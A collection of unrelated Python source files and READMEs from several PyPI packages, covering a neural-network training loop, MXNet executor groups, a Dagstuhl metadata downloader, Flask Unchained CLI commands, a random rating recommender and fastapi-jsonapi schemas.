self.layers = []
self.err = 0
self.loss = None
self.loss_prime = None
self.losses = []
def get_losses(self):
"return losses"
return self.losses
def load(self, layers):
"""takes saved layers and assign them to self.layers"""
for l in layers:
self.layers.append(l)
def save(self):
"""save layers and returns layers list"""
res = []
for l in self.layers:
res.append(l)
return res
# add layer to network
def add(self, layer):
'''
adds layers to the model
:param layer: a NN layer
'''
self.layers.append(layer)
def use(self, loss, loss_prime):
'''
sets the used loss function
:param loss:
:param loss_prime:
:return:
'''
self.loss = loss
self.loss_prime = loss_prime
def predict(self, input_data):
'''
predict X for given input
:param input_data: the input data
:return:
'''
# sample dimension first
samples = len(input_data)
result = []
# run network over all samples
# for i in range(samples):
# forward propagation
# X = input_data[i]
X = input_data
for layer in self.layers:
X = layer.forward(X)
result.append(X)
return result
def train(self, X, Y, learning_rate):
'''
train on sample data
:param X: data sample
:param Y: true values
:param learning_rate: learning rate
'''
for layer in self.layers:
X = layer.forward(X)
# compute loss (for display purpose only)
self.err += self.loss(X, Y)
# backward propagation
error = self.loss_prime(X, Y)
for layer in reversed(self.layers):
error = layer.backward(error, learning_rate)
def fit(self, x_train, y_train, epochs, learning_rate):
'''
train the model on the dataset
:param x_train: the training data
:param y_train: the true values
:param epochs: number of epochs
:param learning_rate: the learning rate of the parameters
'''
print(y_train)
# sample dimension first
samples = len(x_train)
# training loop
for i in range(epochs):
self.err = 0
if (self.training_method == 'online'):
for j in range(samples):
# forward propagation
sh_x = list(x_train.shape) # shape of input, can be any dimension
sh_x[0] = 1
X = x_train[j, :] # will cut the first input dimension
X = X.reshape(sh_x) # will make it 1 * (dimensions)
sh_y = list(y_train.shape) # shape of input, can be any dimension
sh_y[0] = 1
Y = y_train[j, :] # will cut the first input dimension
Y = Y.reshape(sh_y) # will make it 1 * (dimensions)
for layer in self.layers:
X = layer.forward(X)
# compute loss (for display purpose only)
self.err += self.loss(X, Y)
# backward propagation
error = self.loss_prime(X, Y)
for layer in reversed(self.layers):
error = layer.backward(error, learning_rate)
elif (self.training_method == 'batch'):
batch_size = 100
num_of_batches = max(1, math.ceil(samples / batch_size))
j = 0
for j in range(num_of_batches):
begin_index = j * batch_size
end_index = min(samples, begin_index + batch_size)
current_batch_size = end_index - begin_index
sh_x = list(x_train.shape) # shape of input, can be any dimension
sh_x[0] = current_batch_size
X = x_train[begin_index:end_index, :] # will cut the first input dimension
X = X.reshape(sh_x) # will make it 1 * (dimensions)
# X = x_train[begin_index:end_index , :].reshape(current_batch_size,x_train.shape[1])
sh_y = list(y_train.shape) # shape of input, can be any dimension
sh_y[0] = current_batch_size
Y = y_train[begin_index:end_index, :] # will cut the first input dimension
Y = Y.reshape(sh_y) # will make it 1 * (dimensions)
# Y = y_train[begin_index:end_index , : ].reshape(current_batch_size,y_train.shape[1])
for layer in self.layers:
X = layer.forward(X)
print(change_to_vector(X))
print('------------------------------------')
# compute loss (for display purpose only)
self.err += self.loss(X, Y)
# lo = CrossEntropyLoss()
# self.err += lo.forward(X,Y)
# backward propagation
# error = None
error = self.loss_prime(X, Y)
is_softmax = False
if (isinstance(self.layers[-1], ActivationLayer)):
if (id(self.layers[-1].activation) == id(softmax)):
l = Loss()
error = l.softmax_grad(X, Y)
is_softmax = True
else:
error = self.loss_prime(X, Y)
# error = self.loss_prime(X, Y)
for layer in reversed(self.layers):
if (is_softmax):
is_softmax = False
continue
error = layer.backward(error, learning_rate)
# calculate average error on all samples
self.err /= samples
print('epoch %d/%d error=%f' % (i + 1, epochs, self.err))
self.losses.append(self.err) | PypiClean |
/GraphLab_Create-2.1-cp27-none-macosx_10_5_x86_64.macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64.macosx_10_11_intel.macosx_10_11_x86_64.whl/graphlab/mxnet/module/executor_group.py | """Executor group is a convenient tool for managing a group of executors."""
import numpy as np
import logging
from .. import context as ctx
from .. import ndarray as nd
from ..base import mx_real_t
from ..executor_manager import _split_input_slice, _load_data, _load_label
def _merge_multi_context(outputs):
"""Merge outputs that lives on multiple context into one, so that they look
like living on one context.
"""
outputs = [nd.concatenate(x, always_copy=False) for x in outputs]
return outputs
class DataParallelExecutorGroup(object):
"""DataParallelExecutorGroup is a group of executors that lives on a group of devices.
This is a helper class used to implement data parallelization. Each mini-batch will
be split and run on the devices.
Parameters
----------
symbol : Symbol
The common symbolic computation graph for all executors.
contexts : list
A list of contexts.
workload : list
If not `None`, could be a list of numbers that specify the workload to be assigned
to different context. Larger number indicate heavier workload.
data_shapes : list
Should be a list of (name, shape) tuples, for the shapes of data. Note the order is
important and should be the same as the order that the `DataIter` provide the data.
label_shapes : list
Should be a list of (name, shape) tuples, for the shapes of label. Note the order is
important and should be the same as the order that the `DataIter` provide the label.
param_names : list
A list of strings, indicating the names of parameters (e.g. weights, filters, etc.)
in the computation graph.
for_training : bool
Indicate whether the executors should be bind for training. When not doing training,
the memory for gradients will not be allocated.
inputs_need_grad : bool
Indicate whether the gradients for the input data should be computed. This is currently
not used. It will be useful for implementing composition of modules.
shared_group : DataParallelExecutorGroup
Default is `None`. This is used in bucketing. When not `None`, it should be a executor
group corresponding to a different bucket. In other words, it will correspond to a different
symbol but with the same set of parameters (e.g. unrolled RNNs with different lengths).
In this case, many memory will be shared.
input_types : list
Default is `None`. When not `None`, can be used to specify the data type for each
of the data/label inputs.
logger : Logger
Default is `logging`.
"""
def __init__(self, symbol, contexts, workload, data_shapes, label_shapes, param_names,
for_training, inputs_need_grad, shared_group=None, input_types=None,
logger=logging):
self.param_names = param_names
self.arg_names = symbol.list_arguments()
self.aux_names = symbol.list_auxiliary_states()
self.symbol = symbol
self.contexts = contexts
self.workload = workload
self.for_training = for_training
self.inputs_need_grad = inputs_need_grad
self.input_types = input_types
self.logger = logger
if shared_group is not None:
self.shared_data_arrays = shared_group.shared_data_arrays
else:
self.shared_data_arrays = [{} for _ in contexts]
# initialize some instance variables
self.batch_size = None
self.slices = None
self.execs = None
self.data_arrays = None
self.label_arrays = None
self.param_arrays = None
self.grad_arrays = None
self.aux_arrays = None
# calculate workload and bind executors
self.decide_slices(data_shapes)
self.bind_exec(data_shapes, label_shapes, shared_group)
def decide_slices(self, data_shapes):
"""Decide the slices for each context according to the workload.
Parameters
----------
data_shapes : list
list of (name, shape) specifying the shapes for the input data.
"""
assert len(data_shapes) > 0
self.batch_size = data_shapes[0][1][0]
for shape in data_shapes:
assert shape[1][0] == self.batch_size, "all the data must have the same batch size"
self.slices = _split_input_slice(self.batch_size, self.workload)
def bind_exec(self, data_shapes, label_shapes, shared_group):
"""Bind executors on their respective devices.
Parameters
----------
data_shapes : list
label_shapes : list
shared_group : DataParallelExecutorGroup
"""
self.execs = []
for i in range(len(self.contexts)):
self.execs.append(self._bind_ith_exec(i, data_shapes, label_shapes, shared_group))
# convenient data structures
self.data_arrays = [[(self.slices[i], e.arg_dict[name]) for i, e in enumerate(self.execs)]
for name, _ in data_shapes]
if label_shapes is not None:
self.label_arrays = [[(self.slices[i], e.arg_dict[name])
for i, e in enumerate(self.execs)]
for name, _ in label_shapes]
else:
self.label_arrays = None
self.param_arrays = [[exec_.arg_arrays[i] for exec_ in self.execs]
for i, name in enumerate(self.arg_names)
if name in self.param_names]
if self.for_training:
self.grad_arrays = [[exec_.grad_arrays[i] for exec_ in self.execs]
for i, name in enumerate(self.arg_names)
if name in self.param_names]
else:
self.grad_arrays = None
data_names = [x[0] for x in data_shapes]
if self.inputs_need_grad:
self.input_grad_arrays = [[exec_.grad_arrays[i] for exec_ in self.execs]
for i, name in enumerate(self.arg_names)
if name in data_names]
else:
self.input_grad_arrays = None
self.aux_arrays = [[exec_.aux_arrays[i] for exec_ in self.execs]
for i in range(len(self.aux_names))]
def set_params(self, arg_params, aux_params):
"""Assign, i.e. copy parameters to all the executors.
Parameters
----------
arg_params : dict
A dictionary of name to `NDArray` parameter mapping.
aux_params : dict
A dictionary of name to `NDArray` auxiliary variable mapping.
"""
for exec_ in self.execs:
exec_.copy_params_from(arg_params, aux_params)
def get_params(self, arg_params, aux_params):
""" Copy data from each executor to `arg_params` and `aux_params`.
Parameters
----------
arg_params : list of NDArray
target parameter arrays
aux_params : list of NDArray
target aux arrays
Notes
-----
- This function will inplace update the NDArrays in arg_params and aux_params.
"""
for name, block in zip(self.param_names, self.param_arrays):
weight = sum(w.copyto(ctx.cpu()) for w in block) / len(block)
weight.astype(arg_params[name].dtype).copyto(arg_params[name])
for name, block in zip(self.aux_names, self.aux_arrays):
weight = sum(w.copyto(ctx.cpu()) for w in block) / len(block)
weight.astype(aux_params[name].dtype).copyto(aux_params[name])
def forward(self, data_batch, is_train=None):
"""Split `data_batch` according to workload and run forward on each devices.
Parameters
----------
data_batch : DataBatch
Or could be any object implementing similar interface.
is_train : bool
The hint for the backend, indicating whether we are during training phase.
Default is `None`, then the value `self.for_training` will be used.
Returns
-------
"""
_load_data(data_batch, self.data_arrays)
if is_train is None:
is_train = self.for_training
if is_train:
# It could be the case that even though we are binded for training, we
# still do not have label arrays. For example, this could happen if we
# are using a module without a loss function (the user will compute the
# loss and gradients using some other ways), and we do not need the label
# here.
if self.label_arrays is not None:
_load_label(data_batch, self.label_arrays)
for exec_ in self.execs:
exec_.forward(is_train=is_train)
def get_output_shapes(self):
"""Get the shapes of the outputs."""
outputs = self.execs[0].outputs
shapes = [out.shape for out in outputs]
shapes = [tuple([self.batch_size] + list(shape[1:])) for shape in shapes]
return zip(self.symbol.list_outputs(), shapes)
def get_outputs(self, merge_multi_context=True):
"""Get outputs of the previous forward computation.
Parameters
----------
merge_multi_context : bool
Default is `True`. In the case when data-parallelism is used, the outputs
will be collected from multiple devices. A `True` value indicate that we
should merge the collected results so that they look like from a single
executor.
Returns
-------
If `merge_multi_context` is `True`, it is like `[out1, out2]`. Otherwise, it
is like `[[out1_dev1, out1_dev2], [out2_dev1, out2_dev2]]`. All the output
elements are `NDArray`.
"""
outputs = [[exec_.outputs[i] for exec_ in self.execs]
for i in range(len(self.execs[0].outputs))]
if merge_multi_context:
outputs = _merge_multi_context(outputs)
return outputs
def get_input_grads(self, merge_multi_context=True):
"""Get the gradients with respect to the inputs of the module.
Parameters
----------
merge_multi_context : bool
Default is `True`. In the case when data-parallelism is used, the outputs
will be collected from multiple devices. A `True` value indicate that we
should merge the collected results so that they look like from a single
executor.
Returns
-------
If `merge_multi_context` is `True`, it is like `[grad1, grad2]`. Otherwise, it
is like `[[grad1_dev1, grad1_dev2], [grad2_dev1, grad2_dev2]]`. All the output
elements are `NDArray`.
"""
assert self.inputs_need_grad
if merge_multi_context:
return _merge_multi_context(self.input_grad_arrays)
return self.input_grad_arrays
def backward(self, out_grads=None):
"""Run backward on all devices. A backward should be called after
a call to the forward function. Backward cannot be called unless
`self.for_training` is `True`.
Parameters
----------
out_grads : NDArray or list of NDArray, optional
Gradient on the outputs to be propagated back.
This parameter is only needed when bind is called
on outputs that are not a loss function.
"""
assert self.for_training, 're-bind with for_training=True to run backward'
if out_grads is None:
out_grads = []
for i, (exec_, islice) in enumerate(zip(self.execs, self.slices)):
out_grads_slice = [grad[islice].as_in_context(self.contexts[i])
for grad in out_grads]
exec_.backward(out_grads=out_grads_slice)
def update_metric(self, eval_metric, labels):
"""Accumulate the performance according to `eval_metric` on all devices.
Parameters
----------
eval_metric : EvalMetric
The metric used for evaluation.
labels : list of NDArray
Typically comes from `label` of a `DataBatch`.
"""
for texec, islice in zip(self.execs, self.slices):
labels_slice = [label[islice] for label in labels]
eval_metric.update(labels_slice, texec.outputs)
def _bind_ith_exec(self, i, data_shapes, label_shapes, shared_group):
"""Internal utility function to bind the i-th executor.
"""
data_shapes = self._sliced_shape(data_shapes, i)
if label_shapes is not None:
label_shapes = self._sliced_shape(label_shapes, i)
shared_exec = None if shared_group is None else shared_group.execs[i]
context = self.contexts[i]
shared_data_arrays = self.shared_data_arrays[i]
input_shapes = dict(data_shapes)
if label_shapes is not None:
input_shapes.update(dict(label_shapes))
arg_shapes, _, aux_shapes = self.symbol.infer_shape(**input_shapes)
assert arg_shapes is not None, "shape inference failed"
if self.input_types is None:
input_types = {k: mx_real_t for k in input_shapes.keys()}
else:
input_types = self.input_types
arg_types, _, aux_types = self.symbol.infer_type(**input_types)
assert arg_types is not None, "type inference failed"
data_names = [x[0] for x in data_shapes]
arg_arrays = []
grad_arrays = {} if self.for_training else None
grad_req = {}
for name in self.arg_names:
if self.for_training:
if name in self.param_names:
grad_req[name] = 'write'
elif name in data_names:
grad_req[name] = 'write' if self.inputs_need_grad else 'null'
else:
grad_req[name] = 'null'
else:
grad_req[name] = 'null'
def _get_or_reshape(name, shared_data_arrays, arg_shape, arg_type, context, logger):
"""Internal helper to get a memory block or re-use by re-shaping"""
if name in shared_data_arrays:
arg_arr = shared_data_arrays[name]
if np.prod(arg_arr.shape) >= np.prod(arg_shape):
# nice, we can directly re-use this data blob
assert arg_arr.dtype == arg_type
arg_arr = arg_arr.reshape(arg_shape)
else:
logger.warning(('bucketing: data "%s" has a shape %s' % (name, arg_shape)) +
(', which is larger than already allocated ') +
('shape %s' % (arg_arr.shape,)) +
('. Need to re-allocate. Consider putting ') +
('default_bucket_key to') +
(' be the bucket taking the largest input for better ') +
('memory sharing.'))
arg_arr = nd.zeros(arg_shape, context, dtype=arg_type)
# replace existing shared array because the new one is bigger
shared_data_arrays[name] = arg_arr
else:
arg_arr = nd.zeros(arg_shape, context, dtype=arg_type)
shared_data_arrays[name] = arg_arr
return arg_arr
# create or borrow arguments and gradients
for j in range(len(self.arg_names)):
name = self.arg_names[j]
if name in self.param_names: # model parameter
if shared_exec is None:
arg_arr = nd.zeros(arg_shapes[j], context, dtype=arg_types[j])
if grad_req[name] != 'null':
grad_arr = nd.zeros(arg_shapes[j], context, dtype=arg_types[j])
grad_arrays[name] = grad_arr
else:
arg_arr = shared_exec.arg_dict[name]
assert arg_arr.shape == arg_shapes[j]
assert arg_arr.dtype == arg_types[j]
if grad_req[name] != 'null':
grad_arrays[name] = shared_exec.grad_dict[name]
else: # data or label
arg_arr = _get_or_reshape(name, shared_data_arrays, arg_shapes[j], arg_types[j],
context, self.logger)
# data might also need grad if inputs_need_grad is True
if grad_req[name] != 'null':
grad_arrays[name] = _get_or_reshape('grad of ' + name, shared_data_arrays,
arg_shapes[j], arg_types[j], context,
self.logger)
arg_arrays.append(arg_arr)
# create or borrow aux variables
if shared_exec is None:
aux_arrays = [nd.zeros(s, context, dtype=t) for s, t in zip(aux_shapes, aux_types)]
else:
for j, arr in enumerate(shared_exec.aux_arrays):
assert aux_shapes[j] == arr.shape
assert aux_types[j] == arr.dtype
aux_arrays = shared_exec.aux_arrays[:]
executor = self.symbol.bind(ctx=context, args=arg_arrays,
args_grad=grad_arrays, aux_states=aux_arrays,
grad_req=grad_req, shared_exec=shared_exec)
return executor
def _sliced_shape(self, shapes, i):
"""Get the sliced shapes for the i-th executor.
Parameters
----------
shapes : list of (str, tuple)
The original (name, shape) pairs.
i : int
Which executor we are dealing with.
"""
return [(k, tuple([self.slices[i].stop-self.slices[i].start] + list(v[1:])))
for k, v in shapes] | PypiClean |
/MeNLP-2023.4.19.14.13.51.tar.gz/MeNLP-2023.4.19.14.13.51/README.rst | =====
menlp
=====
.. image:: https://img.shields.io/pypi/v/menlp.svg
:target: https://pypi.python.org/pypi/menlp
.. image:: https://img.shields.io/travis/yuanjie-ai/menlp.svg
:target: https://travis-ci.com/yuanjie-ai/menlp
.. image:: https://readthedocs.org/projects/menlp/badge/?version=latest
:target: https://menlp.readthedocs.io/en/latest/?badge=latest
:alt: Documentation Status
Create a Python package.
* Free software: MIT license
* Documentation: https://menlp.readthedocs.io.
Features
--------
* TODO
Credits
-------
This package was created with Cookiecutter_ and the `audreyr/cookiecutter-pypackage`_ project template.
.. _Cookiecutter: https://github.com/audreyr/cookiecutter
.. _`audreyr/cookiecutter-pypackage`: https://github.com/audreyr/cookiecutter-pypackage
| PypiClean |
/Indomielibs-2.0.106.tar.gz/Indomielibs-2.0.106/README.md | <p align="center">
<a href="https://github.com/pyrogram/pyrogram">
<img src="https://docs.pyrogram.org/_static/pyrogram.png" alt="Pyrogram" width="128">
</a>
<br>
<b>Telegram MTProto API Framework for Python</b>
<br>
<a href="https://pyrogram.org">
Homepage
</a>
•
<a href="https://docs.pyrogram.org">
Documentation
</a>
•
<a href="https://docs.pyrogram.org/releases">
Releases
</a>
•
<a href="https://t.me/pyrogram">
News
</a>
</p>
## Pyrogram
> Elegant, modern and asynchronous Telegram MTProto API framework in Python for users and bots
``` python
from pyrogram import Client, filters
app = Client("my_account")
@app.on_message(filters.private)
async def hello(client, message):
await message.reply("Hello from Pyrogram!")
app.run()
```
**Pyrogram** is a modern, elegant and asynchronous [MTProto API](https://docs.pyrogram.org/topics/mtproto-vs-botapi)
framework. It enables you to easily interact with the main Telegram API through a user account (custom client) or a bot
identity (bot API alternative) using Python.
### Support
If you'd like to support Pyrogram, you can consider:
- [Become a GitHub sponsor](https://github.com/sponsors/delivrance).
- [Become a LiberaPay patron](https://liberapay.com/delivrance).
- [Become an OpenCollective backer](https://opencollective.com/pyrogram).
### Key Features
- **Ready**: Install Pyrogram with pip and start building your applications right away.
- **Easy**: Makes the Telegram API simple and intuitive, while still allowing advanced usages.
- **Elegant**: Low-level details are abstracted and re-presented in a more convenient way.
- **Fast**: Boosted up by [TgCrypto](https://github.com/pyrogram/tgcrypto), a high-performance cryptography library written in C.
- **Type-hinted**: Types and methods are all type-hinted, enabling excellent editor support.
- **Async**: Fully asynchronous (also usable synchronously if wanted, for convenience).
- **Powerful**: Full access to Telegram's API to execute any official client action and more.
### Installing
``` bash
pip3 install pyrogram
```
### Resources
- Check out the docs at https://docs.pyrogram.org to learn more about Pyrogram, get started right
away and discover more in-depth material for building your client applications.
- Join the official channel at https://t.me/pyrogram and stay tuned for news, updates and announcements.
| PypiClean |
/ConferenceCorpus-0.1.1.tar.gz/ConferenceCorpus-0.1.1/corpus/datasources/drops.py | from corpus.utils.download import Download
from os import path
import os
import urllib
from corpus.xmlhandler.xmlparser import XMLEntityParser
from corpus.utils.progress import Progress
class DROPS(object):
'''
access to Dagstuhl research online publication server
'''
def __init__(self,maxCollectionId:int):
'''
Constructor
Args:
maxCollectionId(int): the maximum collectionId currently published in DROPS
'''
self.maxCollectionId=maxCollectionId
home = path.expanduser("~")
self.cachedir= f"{home}/.conferencecorpus/drops"
if not os.path.exists(self.cachedir):
os.makedirs(self.cachedir)
def xmlFilepath(self,collectionId):
'''
get my xmlFilepath
Returns:
str: the path to my xml file in the cache directory
'''
xmlp=f"{self.cachedir}/{collectionId}.xml"
return xmlp
def cache(self,collectionId,baseurl="https://submission.dagstuhl.de/services/metadata/xml/collections",force:bool=False,progress:Progress=None):
'''
cache the XML file for the given collectionId
Args:
collectionId(int): the id of the volume
baseurl(str): the base url
force(bool): if true reload even if already cached
progressStep(int): if > 0 show the progress with numeric display every progressStep items
'''
cfilepath=self.xmlFilepath(collectionId)
if Download.needsDownload(cfilepath,force):
url= f"{baseurl}/{collectionId}"
try:
xml=Download.getURLContent(url)
with open(cfilepath, "w") as xmlfile:
xmlfile.write(xml)
if progress is not None:
progress.next()
except urllib.error.HTTPError as err:
if not "HTTP Error 404: Not Found" in str(err):
raise err
pass
def parse(self,collectionId:int,progress:Progress=None):
'''
parse the xml data of volume with the given collectionId
Args:
collectionId(int): the id of the volume
baseurl(str): the base url
force(bool): if true reload even if already cached
progressStep(int): if > 0 show the progress with numeric display every progressStep items
'''
recordTag="{https://submission.dagstuhl.de/services/metadata/xml/dagpub.xsd}volume"
xmlPath=self.xmlFilepath(collectionId)
namespaces={'ns0':'https://submission.dagstuhl.de/services/metadata/xml/dagpub.xsd'}
xmlPropertyMap= {
"title": './ns0:title',
"shortTitle": './ns0:shortTitle',
"date": './ns0:date',
"location": './ns0:location',
'dblp': './ns0:conference/ns0:dblp',
'website': '.ns0:conference/ns0:website'
}
if os.path.exists(xmlPath):
xmlParser=XMLEntityParser(xmlPath,recordTag)
for xmlEntity in xmlParser.parse(xmlPropertyMap,namespaces):
yield(xmlEntity)
if progress is not None:
progress.next() | PypiClean |
/Flask_Unchained-0.9.0-py3-none-any.whl/flask_unchained/commands/unchained.py | from flask_unchained import current_app
from flask_unchained.cli import cli, click, print_table
from ..utils import format_docstring
@cli.group('unchained')
def unchained_group():
"""
Flask Unchained commands.
"""
@unchained_group.command()
def bundles():
"""
List registered bundles.
"""
header = ('Name', 'Location')
rows = [(bundle.name, f'{bundle.__module__}.{bundle.__class__.__name__}')
for bundle in current_app.unchained.bundles.values()]
print_table(header, rows)
@unchained_group.command()
@click.argument('bundle_name', nargs=1, required=False, default=None,
help='Only show options for a specific bundle.')
def config(bundle_name):
"""
Show current app config (or optionally just the options for a specific bundle).
"""
from ..hooks import ConfigureAppHook
bundle = current_app.unchained.bundles[bundle_name] if bundle_name else None
bundle_cfg = (ConfigureAppHook(None).get_bundle_config(bundle, current_app.env)
if bundle else None)
header = ('Config Key', 'Value')
rows = []
for key, value in current_app.config.items():
if not bundle or key in bundle_cfg:
rows.append((key, str(value)))
print_table(header, rows)
@unchained_group.command()
def extensions():
"""
List extensions.
"""
header = ('Name', 'Class', 'Location')
rows = []
for name, ext in current_app.unchained.extensions.items():
ext = ext if not isinstance(ext, tuple) else ext[0]
rows.append((name, ext.__class__.__name__, ext.__module__))
print_table(header, sorted(rows, key=lambda row: row[0]))
@unchained_group.command()
@click.pass_context
def hooks(ctx):
"""
List registered hooks (in the order they run).
"""
from ..app_factory import AppFactory
from ..hooks.run_hooks_hook import RunHooksHook
unchained_config = AppFactory().load_unchained_config(ctx.obj.data['env'])
_, bundles = AppFactory().load_bundles(getattr(unchained_config, 'BUNDLES', []))
hooks = RunHooksHook(None).collect_from_bundles(bundles)
header = ('Hook Name',
'Default Bundle Module(s)',
'Bundle Module(s) Override Attr',
'Description')
rows = []
for hook in hooks:
bundle_module_names = ([hook.bundle_module_name]
if hook.require_exactly_one_bundle_module
else hook.bundle_module_names)
rows.append((
hook.name,
bundle_module_names and ', '.join(bundle_module_names) or '(None)',
hook.bundle_override_module_names_attr or '(None)',
format_docstring(hook.__doc__) or '(None)',
))
print_table(header, rows)
@unchained_group.command()
def services():
"""
List services.
"""
header = ('Name', 'Class', 'Location')
rows = []
for name, svc in current_app.unchained.services.items():
if isinstance(svc, object):
rows.append((name, svc.__class__.__name__, svc.__module__))
elif hasattr(svc, '__module__') and hasattr(svc, '__name__'):
rows.append((name, svc.__name__, svc.__module__))
else:
rows.append((name, str(svc), ''))
# sort by name within (grouped by) location
print_table(
header,
sorted(
sorted(rows, key=lambda row: row[0]),
key=lambda row: row[2]
)
) | PypiClean |
/CaseRecommender-1.1.1.tar.gz/CaseRecommender-1.1.1/caserec/recommenders/rating_prediction/random_rec.py | # © 2019. Case Recommender (MIT License)
import numpy as np
from caserec.recommenders.rating_prediction.base_rating_prediction import BaseRatingPrediction
from caserec.utils.extra_functions import timed
__author__ = 'Fernando S. de Aguiar Neto <fsan110792@gmail.com>'
class RandomRec(BaseRatingPrediction):
def __init__(self, train_file, test_file, uniform=True, output_file=None, sep='\t', output_sep='\t',
random_seed=None):
"""
Random recommendation for Rating Prediction
This algorithm predicts ratings for each user-item
Usage::
>> RandomRec(train, test).compute()
:param train_file: File which contains the train set. This file needs to have at least 3 columns
(user item feedback_value).
:type train_file: str
:param test_file: File which contains the test set. This file needs to have at least 3 columns
(user item feedback_value).
:type test_file: str, default None
:param uniform: Indicates whether the ratings are drawn from a uniform sample or not
if False, the ratings are drawn from a normal distribution with the same mean and standard deviation
as the feedback provided in train
:type uniform: bool, default True
:param output_file: File with dir to write the final predictions
:type output_file: str, default None
:param sep: Delimiter for input files
:type sep: str, default '\t'
:param output_sep: Delimiter for output file
:type output_sep: str, default '\t'
:param random_seed: Number of seed. Lock random numbers for reproducibility of experiments.
:type random_seed: int, default None
"""
super(RandomRec, self).__init__(train_file=train_file, test_file=test_file, output_file=output_file,
sep=sep, output_sep=output_sep)
if random_seed is not None:
np.random.seed(random_seed)
self.uniform = uniform
self.recommender_name = 'Random Recommender'
def predict(self):
if not self.uniform:
feedbacks = []
for user in self.train_set["users"]:
for item in self.train_set['items_seen_by_user'][user]:
feedbacks.append(self.train_set['feedback'][user][item])
std = np.std(feedbacks)
if self.test_file is not None:
for user in self.test_set['users']:
for item in self.test_set['feedback'][user]:
if self.uniform:
feedback_value = np.random.uniform(self.train_set['min_value'], self.train_set['max_value'])
else:
feedback_value = np.random.normal(self.train_set['mean_value'], std)
self.predictions.append((user, item, feedback_value))
else:
raise NotImplemented
def compute(self, verbose=True, metrics=None, verbose_evaluation=True, as_table=False, table_sep='\t'):
"""
Extends compute method from BaseRatingPrediction. Method to run recommender algorithm
:param verbose: Print recommender and database information
:type verbose: bool, default True
:param metrics: List of evaluation measures
:type metrics: list, default None
:param verbose_evaluation: Print the evaluation results
:type verbose_evaluation: bool, default True
:param as_table: Print the evaluation results as table
:type as_table: bool, default False
:param table_sep: Delimiter for print results (only work with verbose=True and as_table=True)
:type table_sep: str, default '\t'
"""
super(RandomRec, self).compute(verbose=verbose)
if verbose:
print("prediction_time:: %4f sec" % timed(self.predict))
print('\n')
else:
self.predict()
self.write_predictions()
if self.test_file is not None:
self.evaluate(metrics, verbose_evaluation, as_table=as_table, table_sep=table_sep) | PypiClean |
/fastapi_jsonapi-2.0.0.tar.gz/fastapi_jsonapi-2.0.0/fastapi_jsonapi/schema.py | from typing import (
TYPE_CHECKING,
Dict,
List,
Optional,
Sequence,
Type,
Union,
)
from fastapi import FastAPI
from pydantic import (
BaseConfig,
BaseModel,
Extra,
Field,
)
if TYPE_CHECKING:
from fastapi_jsonapi.data_typing import TypeSchema
class BaseJSONAPIRelationshipSchema(BaseModel):
id: str = Field(..., description="Related object ID")
type: str = Field(..., description="Type of the related resource object")
class Config(BaseConfig):
extra = Extra.forbid
class BaseJSONAPIRelationshipDataToOneSchema(BaseModel):
data: BaseJSONAPIRelationshipSchema
class BaseJSONAPIRelationshipDataToManySchema(BaseModel):
data: List[BaseJSONAPIRelationshipSchema]
class BaseJSONAPIItemSchema(BaseModel):
"""Base JSON:API item schema."""
type: str = Field(description="Resource type")
attributes: dict = Field(description="Resource object attributes")
class BaseJSONAPIItemInSchema(BaseJSONAPIItemSchema):
"""
post/patch
TODO POST: optionally accept custom id for object
https://jsonapi.org/format/#crud-creating-client-ids
TODO PATCH: accept object id (maybe create a new separate schema)
"""
attributes: "TypeSchema" = Field(description="Resource object attributes")
relationships: Optional["TypeSchema"] = Field(None, description="Resource object relationships")
id: Optional[str] = Field(description="Resource object ID")
class BaseJSONAPIDataInSchema(BaseModel):
data: BaseJSONAPIItemInSchema
class BaseJSONAPIObjectSchema(BaseJSONAPIItemSchema):
"""Base JSON:API object schema."""
id: str = Field(description="Resource object ID")
class JSONAPIResultListMetaSchema(BaseModel):
"""JSON:API list meta schema."""
count: Optional[int]
total_pages: Optional[int] = Field(alias="totalPages")
class Config:
allow_population_by_field_name = True
class JSONAPIDocumentObjectSchema(BaseModel):
"""
JSON:API Document Object Schema.
https://jsonapi.org/format/#document-jsonapi-object
"""
version: str = Field(default="1.0", description="json-api версия")
class JSONAPIObjectSchema(BaseJSONAPIObjectSchema):
"""JSON:API base object schema."""
class BaseJSONAPIResultSchema(BaseModel):
"""
JSON:API Required fields schema
"""
meta: Optional[JSONAPIResultListMetaSchema] = Field(description="JSON:API metadata")
jsonapi: JSONAPIDocumentObjectSchema = JSONAPIDocumentObjectSchema()
class JSONAPIResultListSchema(BaseJSONAPIResultSchema):
"""JSON:API list base result schema."""
data: Sequence[JSONAPIObjectSchema] = Field(description="Resource objects collection")
class JSONAPIResultDetailSchema(BaseJSONAPIResultSchema):
"""JSON:API base detail schema."""
data: JSONAPIObjectSchema = Field(description="Resource object data")
RelationshipInfoSchema = Union[
Type[BaseJSONAPIRelationshipDataToOneSchema],
Type[BaseJSONAPIRelationshipDataToManySchema],
]
def get_model_field(schema: Type["TypeSchema"], field: str) -> str:
"""
Get the model field of a schema field.
# todo: use alias (custom names)?
For example:
class Computer(sqla_base):
user = relationship(User)
class ComputerSchema(pydantic_base):
owner = Field(alias="user", relationship=...)
:param schema: a pydantic schema
:param field: the name of the schema field
:return: the name of the field in the model
:raises Exception: if the schema from parameter has no attribute for parameter.
"""
if schema.__fields__.get(field) is None:
msg = "{schema} has no attribute {field}".format(
schema=schema.__name__,
field=field,
)
raise Exception(msg)
return field
def get_relationships(schema: Type["TypeSchema"], model_field: bool = False) -> List[str]:
"""
Return relationship fields of a schema.
:param schema: a schemas schema
:param model_field: list of relationship fields of a schema
"""
relationships: List[str] = []
for i_name, i_type in schema.__fields__.items():
try:
if issubclass(i_type.type_, BaseModel):
relationships.append(i_name)
except TypeError:
pass
if model_field is True:
relationships = [get_model_field(schema, key) for key in relationships]
return relationships
def get_schema_from_type(resource_type: str, app: FastAPI) -> Type[BaseModel]:
"""
Retrieve a schema from the registry by his type.
:param resource_type: the type of the resource.
:param app: FastAPI app instance.
:return Schema: the schema class.
:raises Exception: if the schema not found for this resource type.
"""
schemas: Dict[str, Type[BaseModel]] = getattr(app, "schemas", {})
try:
return schemas[resource_type]
except KeyError:
msg = "Couldn't find schema for type: {type}".format(type=resource_type)
raise Exception(msg)
def get_related_schema(schema: Type["TypeSchema"], field: str) -> Type["TypeSchema"]:
"""
Retrieve the related schema of a relationship field.
:params schema: the schema to retrieve le relationship field from
:params field: the relationship field
:return: the related schema
"""
return schema.__fields__[field].type_ | PypiClean |
/ARGs_OAP-2.3.2.tar.gz/ARGs_OAP-2.3.2/ARGs_OAP/bin/bbmap/pytools/lib/kmercount_pos.py |
from __future__ import division
import sys
